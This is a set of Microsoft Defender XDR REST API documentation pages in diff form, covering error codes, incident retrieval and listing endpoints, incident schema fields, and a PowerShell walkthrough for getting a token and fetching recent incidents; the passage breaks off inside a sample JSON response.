- var httpClient = new HttpClient();
- var request = new HttpRequestMessage(HttpMethod.Get, "https://api.security.microsoft.com/api/incidents");
-
- request.Headers.Authorization = new AuthenticationHeaderValue("Bearer", token);
-
- var response = httpClient.SendAsync(request).GetAwaiter().GetResult();
-```
-
-## Related articles
--- [Microsoft Defender XDR APIs overview](api-overview.md)-- [Access the Microsoft Defender XDR APIs](api-access.md)-- [Create a 'Hello world' application](api-hello-world.md)-- [Create an app to access Microsoft Defender XDR APIs on behalf of a user](api-create-app-user-context.md)-- [Create an app with multi-tenant partner access to Microsoft Defender XDR APIs](api-partner-access.md)-- [Learn about API limits and licensing](api-terms.md)-- [Understand error codes](api-error-codes.md)-- [Manage secrets in your server apps with Azure Key Vault](/training/modules/manage-secrets-with-azure-key-vault/)-- [OAuth 2.0 authorization for user sign in and API access](/azure/active-directory/develop/active-directory-v2-protocols-oauth-code)
security Api Error Codes https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/api-error-codes.md
- Title: Common Microsoft Defender XDR REST API error codes
-description: Learn about the common Microsoft Defender XDR REST API error codes.
-
- - NOCSH
-----
- - MOE150
- - MET150
- Previously updated : 02/08/2024--
-# Common Microsoft Defender XDR REST API error codes
--
-**Applies to:**
--- Microsoft Defender XDR-
-> [!NOTE]
-> **Try our new APIs using MS Graph security API**. Find out more at: [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview).
-
-> [!IMPORTANT]
-> Some information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-Error codes can be returned by an operation on any of the Microsoft Defender XDR APIs. Every error response contains an error message, which can help resolve the problem. The error message column in the table section provides some sample messages. The content of actual messages varies based on the factors that triggered the response. Variable content is indicated by angle brackets (`< >`) in the following table:
-
-## Error codes
-
-| Error code | HTTP status code | Message |
-|--|--|--|
-| BadRequest | BadRequest (400) | General Bad Request error message. |
-| ODataError | BadRequest (400) | Invalid OData URI query \<the specific error is specified\>. |
-| InvalidInput | BadRequest (400) | Invalid input \<the invalid input\>. |
-| InvalidRequestBody | BadRequest (400) | Invalid request body. |
-| InvalidHashValue | BadRequest (400) | Hash value \<the invalid hash\> is invalid. |
-| InvalidDomainName | BadRequest (400) | Domain name \<the invalid domain\> is invalid. |
-| InvalidIpAddress | BadRequest (400) | IP address \<the invalid IP\> is invalid. |
-| InvalidUrl | BadRequest (400) | URL \<the invalid URL\> is invalid. |
-| MaximumBatchSizeExceeded | BadRequest (400) | Maximum batch size exceeded. Received: \<batch size received\>, allowed: {batch size allowed}. |
-| MissingRequiredParameter | BadRequest (400) | Parameter \<the missing parameter\> is missing. |
-| OsPlatformNotSupported | BadRequest (400) | OS Platform \<the client OS Platform\> isn't supported for this action. |
-| ClientVersionNotSupported | BadRequest (400) | \<The requested action\> is supported on client version \<supported client version\> and later. |
-| Unauthorized | Unauthorized (401) | Unauthorized <br /><br />*This error is usually caused by an invalid or expired authorization header.* |
-| Forbidden | Forbidden (403) | Forbidden <br /><br />*This error can occur with a valid token but insufficient permission for the action*. |
-| DisabledFeature | Forbidden (403) | Tenant feature isn't enabled. |
-| DisallowedOperation | Forbidden (403) | \<the disallowed operation and the reason\>. |
-| NotFound | Not Found (404) | General Not Found error message. |
-| ResourceNotFound | Not Found (404) | Resource \<the requested resource\> wasn't found. |
-| InternalServerError | Internal Server Error (500) | *If there's no error message, retry the operation. [Contact Microsoft](../../admin/get-help-support.md) if it doesn't get resolved*. |
-
-## Examples
-
-```json
-{
- "error": {
- "code": "ResourceNotFound",
- "message": "Machine 123123123 was not found",
- "target": "43f4cb08-8fac-4b65-9db1-745c2ae65f3a"
- }
-}
-```
-
-```json
-{
- "error": {
- "code": "InvalidRequestBody",
- "message": "Request body is incorrect",
- "target": "1fa66c0f-18bd-4133-b378-36d76f3a2ba0"
- }
-}
-```
-
-## Body parameters
-
-> [!IMPORTANT]
-> Body parameters are case-sensitive.
-
-If you experience an *InvalidRequestBody* or *MissingRequiredParameter* error, it might be caused by a typo. Review the API documentation and check that the submitted parameters match the relevant example.
-
-## Tracking ID
-
-Each error response contains a unique ID parameter for tracking. The property name of this parameter is *target*. If you contact Microsoft about an error, attaching your tracking ID helps Microsoft find the root cause of the problem.
-
-## Related articles
--- [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview)-- [Microsoft Defender XDR APIs overview](api-overview.md)-- [Supported Microsoft Defender XDR APIs](api-supported.md)-- [Access the Microsoft Defender XDR APIs](api-access.md)-- [Learn about API limits and licensing](api-terms.md)-
security Api Get Incident https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/api-get-incident.md
- Title: Get incident API
-description: Learn how to use the Get incidents API to get a single incident in Microsoft Defender XDR.
------- Previously updated : 02/08/2024--
-# Get incident information API
--
-**Applies to:**
-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://www.microsoft.com/microsoft-365/windows/microsoft-defender-atp?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-> [!NOTE]
-> **Try our new APIs using MS Graph security API**. Find out more at: [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview).
-
-## API description
-
-Retrieves a specific incident by its ID
-
-## Limitations
-
-1. Rate limitations for this API are 100 calls per minute and 1,500 calls per hour.
-
-## Permissions
-
-One of the following permissions is required to call this API.
-
-| Permission type|Permission|Permission display name |
-||||
-|Application|Incident.Read.All|`Read all Incidents`|
-|Application|Incident.ReadWrite.All|`Read and write all Incidents`|
-|Delegated (work or school account)|Incident.Read|`Read Incidents`|
-|Delegated (work or school account)|Incident.ReadWrite|`Read and write Incidents`|
-
-> [!NOTE]
->
-> When obtaining a token using user credentials:
->
-> - The user needs to have at least the following role permission: `View Data`
-> - The response will only include incidents that the user is exposed to
-
-## HTTP request
-
-```console
-GET .../api/incidents/{id}
-```
-
-## Request headers
-
-|Name|Type|Description|
-||||
-|Authorization|String|Bearer {token}. **Required**.|
-
-## Request body
-
-Empty
-
-## Response
-
-If successful, this method returns `200 OK`, and the incident entity in the response body.
-If incident with the specified ID wasn't found - 404 Not Found.
-
-## Example
-
-### Request
-
-Here's an example of the request.
-
-```http
-GET https://api.security.microsoft.com/api/incidents/{id}
-```
-## Related articles
-
-[Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview)
-
security Api Hello World https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/api-hello-world.md
- Title: Hello World for Microsoft Defender XDR REST API
-description: Learn how to create an app and use a token to access the Microsoft Defender XDR APIs
-
- - NOCSH
-----
- - MOE150
- - MET150
- Previously updated : 02/16/2024--
-# Hello World for Microsoft Defender XDR REST API
--
-**Applies to:**
--- Microsoft Defender XDR-
-> [!IMPORTANT]
-> Some information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-## Get incidents using a simple PowerShell script
-
-It should take 5 to 10 minutes to complete this project. This time estimate includes registering the application, and applying the code from the PowerShell sample script.
-
-<a name='register-an-app-in-azure-active-directory'></a>
-
-### Register an app in Microsoft Entra ID
-
-1. Sign in to [Azure](https://portal.azure.com) as a user with the **Global administrator** role.
-
-2. Navigate to **Microsoft Entra ID** > **App registrations** > **New registration**.
-
- :::image type="content" source="../../media/atp-azure-new-app2.png" alt-text="The New registration section in the Microsoft Defender portal" lightbox="../../media/atp-azure-new-app2.png":::
-
-3. In the registration form, choose a name for your application, then select **Register**. Selecting a redirect URI is optional. You won't need one to complete this example.
-
-4. On your application page, select **API Permissions** > **Add permission** > **APIs my organization uses** >, type **Microsoft Threat Protection**, and select **Microsoft Threat Protection**. Your app can now access Microsoft Defender XDR.
-
- > [!TIP]
- > *Microsoft Threat Protection* is a former name for Microsoft Defender XDR, and will not appear in the original list. You need to start writing its name in the text box to see it appear.
- :::image type="content" source="../../media/apis-in-my-org-tab.PNG" alt-text="The section of APIs usage in the Microsoft Defender portal" lightbox="../../media/apis-in-my-org-tab.PNG":::
-
- - Choose **Application permissions** > **Incident.Read.All** and select **Add permissions**.
-
- :::image type="content" source="../../media/request-api-permissions.PNG" alt-text="An application's permissions pane in the Microsoft Defender portal" lightbox="../../media/request-api-permissions.PNG":::
-
-5. Select **Grant admin consent**. Every time you add a permission, you must select **Grant admin consent** for it to take effect.
-
- :::image type="content" source="../../media/grant-consent.PNG" alt-text=" The Grant admin consent section in the Microsoft Defender portal" lightbox="../../media/grant-consent.PNG":::
-
-6. Add a secret to the application. Select **Certificates & secrets**, add a description to the secret, then select **Add**.
-
- > [!TIP]
- > After you select **Add**, select **copy the generated secret value**. You won't be able to retrieve the secret value after you leave.
-
- :::image type="content" source="../../media/webapp-create-key2.png" alt-text=" The add secret section in the Microsoft Defender portal" lightbox="../../media/webapp-create-key2.png":::
-
-
-7. Record your application ID and your tenant ID somewhere safe. They're listed under **Overview** on your application page.
-
- :::image type="content" source="../../media/app-and-tenant-ids.png" alt-text="The Overview section in the Microsoft Defender portal" lightbox="../../media/app-and-tenant-ids.png":::
-
-### Get a token using the app and use the token to access the API
-
-For more information on Microsoft Entra tokens, see the [Microsoft Entra tutorial](/azure/active-directory/develop/active-directory-v2-protocols-oauth-client-creds).
-
-> [!IMPORTANT]
-> Although the example in this demo app encourage you to paste in your secret value for testing purposes, you should **never hardcode secrets** into an application running in production. A third party could use your secret to access resources. You can help keep your app's secrets secure by using [Azure Key Vault](/azure/key-vault/general/about-keys-secrets-certificates). For a practical example of how you can protect your app, see [Manage secrets in your server apps with Azure Key Vault](/training/modules/manage-secrets-with-azure-key-vault/).
-
-1. Copy the script below and paste it into your favorite text editor. Save as **Get-Token.ps1**. You can also run the code as-is in PowerShell ISE, but you should save it, because we'll need to run it again when we use the incident-fetching script in the next section.
-
- This script will generate a token and save it in the working folder under the name, *Latest-token.txt*.
-
- ```PowerShell
- # This script gets the app context token and saves it to a file named "Latest-token.txt" under the current directory.
- # Paste in your tenant ID, client ID and app secret (App key).
-
- $tenantId = '' # Paste your directory (tenant) ID here
- $clientId = '' # Paste your application (client) ID here
- $appSecret = '' # # Paste your own app secret here to test, then store it in a safe place!
-
- $resourceAppIdUri = 'https://api.security.microsoft.com'
- $oAuthUri = "https://login.windows.net/$tenantId/oauth2/token"
- $authBody = [Ordered] @{
- resource = $resourceAppIdUri
- client_id = $clientId
- client_secret = $appSecret
- grant_type = 'client_credentials'
- }
- $authResponse = Invoke-RestMethod -Method Post -Uri $oAuthUri -Body $authBody -ErrorAction Stop
- $token = $authResponse.access_token
- Out-File -FilePath "./Latest-token.txt" -InputObject $token
- return $token
- ```
-
-#### Validate the token
-
-1. Copy and paste the token you received into [JWT](https://jwt.ms) to decode it.
-1. *JWT* stands for *JSON Web Token*. The decoded token will contain a number of JSON-formatted items or claims. Make sure that the *roles* claim within the decoded token contains the desired permissions.
-
- In the following image, you can see a decoded token acquired from an app, with ```Incidents.Read.All```, ```Incidents.ReadWrite.All```, and ```AdvancedHunting.Read.All``` permissions:
-
- :::image type="content" source="../../media/api-jwt-ms.png" alt-text="The Decoded Token section in the Microsoft Defender portal" lightbox="../../media/api-jwt-ms.png":::
-
-### Get a list of recent incidents
-
-The script below will use **Get-Token.ps1** to access the API. It then retrieves a list of incidents that were last updated within the past 48 hours, and saves the list as a JSON file.
-
-> [!IMPORTANT]
-> Save this script in the same folder you saved **Get-Token.ps1**.
-
-```PowerShell
-# This script returns incidents last updated within the past 48 hours.
-
-$token = ./Get-Token.ps1
-
-# Get incidents from the past 48 hours.
-# The script may appear to fail if you don't have any incidents in that time frame.
-$dateTime = (Get-Date).ToUniversalTime().AddHours(-48).ToString("o")
-
-# This URL contains the type of query and the time filter we created above.
-# Note that `$filter` does not refer to a local variable in our script --
-# it's actually an OData operator and part of the API's syntax.
-$url = "https://api.security.microsoft.com/api/incidents`?`$filter=lastUpdateTime+ge+$dateTime"
-
-# Set the webrequest headers
-$headers = @{
- 'Content-Type' = 'application/json'
- 'Accept' = 'application/json'
- 'Authorization' = "Bearer $token"
-}
-
-# Send the request and get the results.
-$response = Invoke-WebRequest -Method Get -Uri $url -Headers $headers -ErrorAction Stop
-
-# Extract the incidents from the results.
-$incidents = ($response | ConvertFrom-Json).value | ConvertTo-Json -Depth 99
-
-# Get a string containing the execution time. We concatenate that string to the name
-# of the output file to avoid overwriting the file on consecutive runs of the script.
-$dateTimeForFileName = Get-Date -Format o | foreach {$_ -replace ":", "."}
-
-# Save the result as json
-$outputJsonPath = "./Latest Incidents $dateTimeForFileName.json"
-
-Out-File -FilePath $outputJsonPath -InputObject $incidents
-```
-
-You're all done! You've successfully:
--- Created and registered an application.-- Granted permission for that application to read alerts.-- Connected to the API.-- Used a PowerShell script to return incidents updated in the past 48 hours.-
-## Related articles
--- [Microsoft Defender XDR APIs overview](api-overview.md)-- [Access the Microsoft Defender XDR APIs](api-access.md)-- [Create an app to access Microsoft Defender XDR without a user](api-create-app-web.md)-- [Create an app to access Microsoft Defender XDR APIs on behalf of a user](api-create-app-user-context.md)-- [Create an app with multi-tenant partner access to Microsoft Defender XDR APIs](api-partner-access.md)-- [Manage secrets in your server apps with Azure Key Vault](/training/modules/manage-secrets-with-azure-key-vault/)-- [OAuth 2.0 Authorization for user sign in and API access](/azure/active-directory/develop/active-directory-v2-protocols-oauth-code)
security Api Incident https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/api-incident.md
- Title: Microsoft Defender XDR incidents APIs and the incidents resource type
-description: Learn about the methods and properties of the Incidents resource type in Microsoft Defender XDR.
-
- - NOCSH
-----
- - MOE150
- - MET150
- Previously updated : 02/08/2024--
-# Microsoft Defender XDR incidents API and the incidents resource type
--
-**Applies to:**
--- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/p/?linkid=2118804)-
-> [!NOTE]
-> **Try our new APIs using MS Graph security API**. Find out more at: [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview?view=graph-rest-1.0&preserve-view=true).
-
-> [!IMPORTANT]
-> Some information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-An [incident](incidents-overview.md) is a collection of related alerts that help describe an attack. Events from different entities in your organization are aggregated automatically by Microsoft Defender XDR. You can use the incidents API to programmatically access your organization's incidents and related alerts.
-
-## Quotas and resource allocation
-
-You can request up to 50 calls per minute or 1,500 calls per hour. Each method also has its own quotas. For more information on method-specific quotas, see the respective article for the method you want to use.
-
-A `429` HTTP response code indicates that you've reached a quota, either by number of requests sent, or by allotted running time. The response body includes the time until the quota you reached is reset.
-
-## Permissions
-
-The incidents API requires different kinds of permissions for each of its methods. For more information about required permissions, see the respective method's article.
-
-## Methods
-
-Method | Return Type | Description
--|-|-
-[List incidents](api-list-incidents.md) | [Incident](api-incident.md) list | Get a list of incidents.
-[Update incident](api-update-incidents.md) | [Incident](api-incident.md) | Update a specific incident.
-[Get incident](api-get-incident.md) | [Incident](api-incident.md) | Get a single incident.
-
-## Request body, response, and examples
-
-Refer to the respective method articles for more details on how to construct a request or parse a response, and for practical examples.
-
-## Common properties
-
-| Property | Type | Description |
-|-|-|-|
-| incidentId | long | Incident unique ID. |
-| redirectIncidentId | nullable long | The Incident ID the current Incident was merged to. |
-| incidentName | string | The name of the Incident. |
-| createdTime | DateTimeOffset | The date and time (in UTC) the Incident was created. |
-| lastUpdateTime | DateTimeOffset | The date and time (in UTC) the Incident was last updated. |
-| assignedTo | string | Owner of the Incident. |
-| severity | Enum | Severity of the Incident. Possible values are: `UnSpecified`, `Informational`, `Low`, `Medium`, and `High`. |
-| status | Enum | Specifies the current status of the incident. Possible values are: `Active`, `InProgress`, `Resolved`, and `Redirected`. |
-| classification | Enum | Specification of the incident. Possible values are: `TruePositive`, `Informational, expected activity`, and `FalsePositive`. |
-| determination | Enum | Specifies the determination of the incident. <p>Possible determination values for each classification are: <br><li> <b>True positive</b>: `Multistage attack` (MultiStagedAttack), `Malicious user activity` (MaliciousUserActivity), `Compromised account` (CompromisedUser) ΓÇô consider changing the enum name in public api accordingly, `Malware` (Malware), `Phishing` (Phishing), `Unwanted software` (UnwantedSoftware), and `Other` (Other). <li> <b>Informational, expected activity:</b> `Security test` (SecurityTesting), `Line-of-business application` (LineOfBusinessApplication), `Confirmed activity` (ConfirmedUserActivity) - consider changing the enum name in public api accordingly, and `Other` (Other). <li> <b>False positive:</b> `Not malicious` (Clean) - consider changing the enum name in public api accordingly, `Not enough data to validate` (InsufficientData), and `Other` (Other). |
-| tags | string list | List of Incident tags. |
-| comments | List of incident comments | Incident Comment object contains: comment string, createdBy string, and createTime date time. |
-| alerts | alert list | List of related alerts. See examples at [List incidents](api-list-incidents.md) API documentation. |
-
-> [!NOTE]
-> Around August 29, 2022, previously supported alert determination values (`Apt` and `SecurityPersonnel`) will be deprecated and no longer available via the API.
-
-## Related articles
--- [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview)--- [Microsoft Defender XDR APIs overview](api-overview.md)-- [Incidents overview](incidents-overview.md)-- [List incidents API](api-list-incidents.md)-- [Update incident API](api-update-incidents.md)-
security Api List Incidents https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/api-list-incidents.md
- Title: List incidents API in Microsoft Defender XDR
-description: Learn how to list incidents API in Microsoft Defender XDR
-
- - NOCSH
-----
- - MOE150
- - MET150
- Previously updated : 02/08/2024--
-# List incidents API in Microsoft Defender XDR
---
-**Applies to:**
--- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> [!NOTE]
-> **Try our new APIs using MS Graph security API**. Find out more at: [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview).
-> [!IMPORTANT]
-> Some information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-## API description
-
-The list incidents API allows you to sort through incidents to create an informed cybersecurity response. It exposes a collection of incidents that were flagged in your network, within the time range you specified in your environment retention policy. The most recent incidents are displayed at the top of the list. Each incident contains an array of related alerts, and their related entities.
-
-The API supports the following **OData** operators:
--- `$filter` on the `lastUpdateTime`, `createdTime`, `status`, and `assignedTo` properties-- `$top`, with a maximum value of **100**-- `$skip`-
-## Limitations
-
-1. Maximum page size is **100 incidents**.
-2. Maximum rate of requests is **50 calls per minute** and **1500 calls per hour**.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Access Microsoft Defender XDR APIs](api-access.md)
-
-Permission type|Permission|Permission display name
-||
-Application|Incident.Read.All|Read all incidents
-Application|Incident.ReadWrite.All|Read and write all incidents
-Delegated (work or school account)|Incident.Read|Read incidents
-Delegated (work or school account)|Incident.ReadWrite|Read and write incidents
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - The user needs to have view permission for incidents in the portal.
-> - The response will only include incidents that the user is exposed to.
-
-## HTTP request
-
-```HTTP
-GET /api/incidents
-```
-
-## Request headers
-
-Name|Type|Description
-||
-Authorization|String|Bearer {token}. **Required**
-
-## Request body
-
-None.
-
-## Response
-
-If successful, this method returns `200 OK`, and a list of [incidents](api-incident.md) in the response body.
-
-## Schema mapping
-
-### Incident metadata
-
-Field name|Description|Example value
-||
-incidentId|Unique identifier to represent the incident|924565
-redirectIncidentId|Only populated in case an incident is being grouped together with another incident, as part of the incident processing logic.|924569
-incidentName|String value available for every incident.|Ransomware activity
-createdTime|Time when incident was first created.|2020-09-06T14:46:57.0733333Z
-lastUpdateTime|Time when the incident was last updated on the backend. <p> This field can be used when you're setting the request parameter for the range of time that incidents are retrieved.|2020-09-06T14:46:57.29Z
-assignedTo|Owner of the incident, or *null* if no owner is assigned.|secop2@contoso.com
-classification|The specification for the incident. The property values are: *Unknown*, *FalsePositive*, *TruePositive*|Unknown
-determination|Specifies the determination of the incident. The property values are: *NotAvailable*, *Apt*, *Malware*, *SecurityPersonnel*, *SecurityTesting*, *UnwantedSoftware*, *Other*|NotAvailable
-detectionSource|Specifies source of detection.|Defender for Cloud Apps
-status|Categorize incidents (as *Active*, or *Resolved*). It can help you organize and manage your response to incidents.|Active
-severity|Indicates the possible impact on assets. The higher the severity the bigger the impact. Typically higher severity items require the most immediate attention. <p> One of the following values: *Informational*, *Low*, *Medium, and *High*.|Medium
-tags|Array of custom tags associated with an incident, for example to flag a group of incidents with a common characteristic.|\[\]
-comments|Array of comments created by secops when managing the incident, for example additional information about the classification selection.|\[\]
-alerts|Array containing all of the alerts related to the incident, plus other information, such as severity, entities that were involved in the alert, and the source of the alerts.|\[\] (see details on alert fields below)
-
-### Alerts metadata
-
-Field name|Description|Example value
-||
-alertId|Unique identifier to represent the alert|caD70CFEE2-1F54-32DB-9988-3A868A1EBFAC
-incidentId|Unique identifier to represent the incident this alert is associated with|924565
-serviceSource|Service that the alert originates from, such as Microsoft Defender for Endpoint, Microsoft Defender for Cloud Apps, Microsoft Defender for Identity, or Microsoft Defender for Office 365.|MicrosoftCloudAppSecurity
-creationTime|Time when alert was first created.|2020-09-06T14:46:55.7182276Z
-lastUpdatedTime|Time when alert was last updated at the backend.|2020-09-06T14:46:57.2433333Z
-resolvedTime|Time when alert was resolved.|2020-09-10T05:22:59Z
-firstActivity|Time when alert first reported that activity was updated at the backend.|2020-09-04T05:22:59Z
-title|Brief identifying string value available for each alert.|Ransomware activity
-description|String value describing each alert.|The user Test User2 (testUser2@contoso.com) manipulated 99 files with multiple extensions ending with the uncommon extension *herunterladen*. This is an unusual number of file manipulations and is indicative of a potential ransomware attack.
-category|Visual and numeric view of how far the attack has progressed along the kill chain. Aligned to the [MITRE ATT&CK&trade; framework](https://attack.mitre.org/).|Impact
-status|Categorize alerts (as *New*, *Active*, or *Resolved*). It can help you organize and manage your response to alerts.|New
-severity|Indicates the possible impact on assets. The higher the severity the bigger the impact. Typically higher severity items require the most immediate attention.<br>One of the following values: *Informational*, *Low*, *Medium*, and *High*.|Medium
-investigationId|The automated investigation ID triggered by this alert.|1234
-investigationState|Information on the investigation's current status. One of the following values: *Unknown*, *Terminated*, *SuccessfullyRemediated*, *Benign*, *Failed*, *PartiallyRemediated*, *Running*, *PendingApproval*, *PendingResource*, *PartiallyInvestigated*, *TerminatedByUser*, *TerminatedBySystem*, *Queued*, *InnerFailure*, *PreexistingAlert*, *UnsupportedOs*, *UnsupportedAlertType*, *SuppressedAlert*.|UnsupportedAlertType
-classification|The specification for the incident. The property values are: *Unknown*, *FalsePositive*, *TruePositive*, or *null*|Unknown
-determination|Specifies the determination of the incident. The property values are: *NotAvailable*, *Apt*, *Malware*, *SecurityPersonnel*, *SecurityTesting*, *UnwantedSoftware*, *Other* or *null*|Apt
-assignedTo|Owner of the incident, or *null* if no owner is assigned.|secop2@contoso.com
-actorName|The activity group, if any, the associated with this alert.|BORON
-threatFamilyName|Threat family associated with this alert.|null
-mitreTechniques|The attack techniques, as aligned with the [MITRE ATT&CK](https://attack.mitre.org/)&trade; framework.|\[\]
-devices|All devices where alerts related to the incident were sent.|\[\] (see details on entity fields below)
-
-### Device format
-
-Field name|Description|Example value
-||
-DeviceId|The device ID as designated in Microsoft Defender for Endpoint.|24c222b0b60fe148eeece49ac83910cc6a7ef491
-aadDeviceId|The device ID as designated in [Microsoft Entra ID](/azure/active-directory/fundamentals/active-directory-whatis). Only available for domain-joined devices.|null
-deviceDnsName|The fully qualified domain name for the device.|user5cx.middleeast.corp.contoso.com
-osPlatform|The OS platform the device is running.|WindowsServer2016
-osBuild|The build version for the OS the device is running.|14393
-rbacGroupName|The [role-based access control](/azure/role-based-access-control/overview) (RBAC) group associated with the device.|WDATP-Ring0
-firstSeen|Time when device was first seen.|2020-02-06T14:16:01.9330135Z
-healthStatus|The health state of the device.|Active
-riskScore|The risk score for the device.|High
-entities|All entities that have been identified to be part of, or related to, a given alert.|\[\] (see details on entity fields below)
-
-### Entity Format
-
-Field name|Description|Example value
-||
-entityType|Entities that have been identified to be part of, or related to, a given alert.<br>The properties values are: *User*, *Ip*, *Url*, *File*, *Process*, *MailBox*, *MailMessage*, *MailCluster*, *Registry*|User
-sha1|Available if entityType is *File*.<br>The file hash for alerts associated with a file or process.|5de839186691aa96ee2ca6d74f0a38fb8d1bd6dd
-sha256|Available if entityType is *File*.<br>The file hash for alerts associated with a file or process.|28cb017dfc99073aa1b47c1b30f413e3ce774c4991eb4158de50f9dbb36d8043
-fileName|Available if entityType is *File*.<br>The file name for alerts associated with a file or process|Detector.UnitTests.dll
-filePath|Available if entityType is *File*.<br>The file path for alerts associated with a file or process|C:\\\agent_work_temp\Deploy\SYSTEM\2020-09-06 12_14_54\Out
-processId|Available if entityType is *Process*.|24348
-processCommandLine|Available if entityType is *Process*.|"Your File Is Ready To Download\_1911150169.exe"
-processCreationTime|Available if entityType is *Process*.|2020-07-18T03:25:38.5269993Z
-parentProcessId|Available if entityType is *Process*.|16840
-parentProcessCreationTime|Available if entityType is *Process*.|2020-07-18T02:12:32.8616797Z
-ipAddress|Available if entityType is *Ip*. <br>IP address for alerts associated with network events, such as *Communication to a malicious network destination*.|62.216.203.204
-url|Available if entityType is *Url*. <br>Url for alerts associated to network events, such as, *Communication to a malicious network destination*.|down.esales360.cn
-accountName|Available if entityType is *User*.|testUser2
-domainName|Available if entityType is *User*.|europe.corp.contoso
-userSid|Available if entityType is *User*.|S-1-5-21-1721254763-462695806-1538882281-4156657
-aadUserId|Available if entityType is *User*.|fc8f7484-f813-4db2-afab-bc1507913fb6
-userPrincipalName|Available if entityType is *User*/*MailBox*/*MailMessage*.|testUser2@contoso.com
-mailboxDisplayName|Available if entityType is *MailBox*.|test User2
-mailboxAddress|Available if entityType is *User*/*MailBox*/*MailMessage*.|testUser2@contoso.com
-clusterBy|Available if entityType is *MailCluster*.|Subject;P2SenderDomain;ContentType
-sender|Available if entityType is *User*/*MailBox*/*MailMessage*.|user.abc@mail.contoso.co.in
-recipient|Available if entityType is *MailMessage*.|testUser2@contoso.com
-subject|Available if entityType is *MailMessage*.|\[EXTERNAL\] Attention
-deliveryAction|Available if entityType is *MailMessage*.|Delivered
-securityGroupId|Available if entityType is *SecurityGroup*.|301c47c8-e15f-4059-ab09-e2ba9ffd372b
-securityGroupName|Available if entityType is *SecurityGroup*.|Network Configuration Operators
-registryHive|Available if entityType is *Registry*.|HKEY\_LOCAL\_MACHINE|
-registryKey|Available if entityType is *Registry*.|SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
-registryValueType|Available if entityType is *Registry*.|String
-registryValue|Available if entityType is *Registry*.|31-00-00-00
-deviceId|The ID, if any, of the device related to the entity.|986e5df8b73dacd43c8917d17e523e76b13c75cd
-
-## Example
-
-### Request example
-
-```HTTP
-GET https://api.security.microsoft.com/api/incidents
-```
-
-### Response example
-
-```json
-{
- "@odata.context": "https://api.security.microsoft.com/api/$metadata#Incidents",
- "value": [
- {
- "incidentId": 924565,
- "redirectIncidentId": null,
- "incidentName": "Ransomware activity",
- "createdTime": "2020-09-06T14:46:57.0733333Z",
- "lastUpdateTime": "2020-09-06T14:46:57.29Z",
- "assignedTo": null,
- "classification": "Unknown",
- "determination": "NotAvailable",
- "status": "Active",
- "severity": "Medium",
- "tags": [],
- "comments": [
- {
- "comment": "test comment for docs",
- "createdBy": "secop123@contoso.com",
- "createdTime": "2021-01-26T01:00:37.8404534Z"
- }
- ],
- "alerts": [
- {
- "alertId": "caD70CFEE2-1F54-32DB-9988-3A868A1EBFAC",
- "incidentId": 924565,
- "serviceSource": "MicrosoftCloudAppSecurity",
- "creationTime": "2020-09-06T14:46:55.7182276Z",
- "lastUpdatedTime": "2020-09-06T14:46:57.2433333Z",
- "resolvedTime": null,
- "firstActivity": "2020-09-04T05:22:59Z",
- "lastActivity": "2020-09-04T05:22:59Z",
- "title": "Ransomware activity",
- "description": "The user Test User2 (testUser2@contoso.com) manipulated 99 files with multiple extensions ending with the uncommon extension herunterladen. This is an unusual number of file manipulations and is indicative of a potential ransomware attack.",
- "category": "Impact",
- "status": "New",
- "severity": "Medium",
- "investigationId": null,
- "investigationState": "UnsupportedAlertType",
- "classification": null,
- "determination": null,
- "detectionSource": "MCAS",
- "assignedTo": null,
- "actorName": null,
- "threatFamilyName": null,
- "mitreTechniques": [],
- "devices": [],
- "entities": [
- {
- "entityType": "User",
- "sha1": null,
- "sha256": null,
- "fileName": null,
- "filePath": null,
- "processId": null,
- "processCommandLine": null,
- "processCreationTime": null,
- "parentProcessId": null,
- "parentProcessCreationTime": null,
- "ipAddress": null,
- "url": null,
- "accountName": "testUser2",
- "domainName": "europe.corp.contoso",
- "userSid": "S-1-5-21-1721254763-462695806-1538882281-4156657",
- "aadUserId": "fc8f7484-f813-4db2-afab-bc1507913fb6",
- "userPrincipalName": "testUser2@contoso.com",
- "mailboxDisplayName": null,
- "mailboxAddress": null,
- "clusterBy": null,
- "sender": null,
- "recipient": null,
- "subject": null,
- "deliveryAction": null,
- "securityGroupId": null,
- "securityGroupName": null,
- "registryHive": null,
- "registryKey": null,
- "registryValueType": null,
- "registryValue": null,
- "deviceId": null
- },
- {
- "entityType": "Ip",
- "sha1": null,
- "sha256": null,
- "fileName": null,
- "filePath": null,
- "processId": null,
- "processCommandLine": null,
- "processCreationTime": null,
- "parentProcessId": null,
- "parentProcessCreationTime": null,
- "ipAddress": "62.216.203.204",
- "url": null,
- "accountName": null,
- "domainName": null,
- "userSid": null,
- "aadUserId": null,
- "userPrincipalName": null,
- "mailboxDisplayName": null,
